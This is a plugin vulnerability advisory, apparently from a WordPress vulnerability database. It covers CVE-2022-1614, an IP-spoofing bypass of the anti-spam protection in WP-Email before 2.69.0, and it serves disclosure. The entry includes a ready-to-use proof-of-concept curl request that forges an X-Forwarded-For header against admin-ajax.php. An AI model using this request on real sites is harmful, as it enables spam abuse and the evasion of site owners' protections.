WP-Email < 2.69.0 – Anti-Spam Protection Bypass via IP Spoofing | CVE 2022-1614 | Plugin Vulnerabilities

Description

The plugin prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.

Proof of Concept

Set HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR or any of the other headers used in get_ipaddress().

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST -H 'X-Forwarded-For: 127.0.0.1' --data-raw 'action=email&yourname=admin&youremail=attack@attack.me&yourremarks=asdasd&friendname=Igor Popov&friendemail=ip@internet.com&imageverify=ME5RJ&p=177&wp-email_nonce=646bfc1f45'

Affects Plugins

Fixed in 2.69.0

References

CVE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

a5940d0b-6b88-4418-87e2-02c0897bc2f1

Timeline

Publicly Published

2022-05-30 (about 3 years ago)

Added

2022-05-30 (about 3 years ago)

Last Updated

2023-02-23 (about 2 years ago)

Other

Published

Title

Published

2017-01-26

Title

WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users

Published

2015-04-20

Title

Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

Published

2018-08-26

Title

Ajax BootModal Login <= 1.4.3 - Captcha Reuse

Published

2018-11-12

Title

Social Sharing Plugin - Kiwi < 2.0.11 - Arbitrary WordPress Options Update

Published

2024-09-17

Title

WP Hardening – Fix Your WordPress Security < 1.2.7 - Unauthenticated Security Feature Bypass to Username Enumeration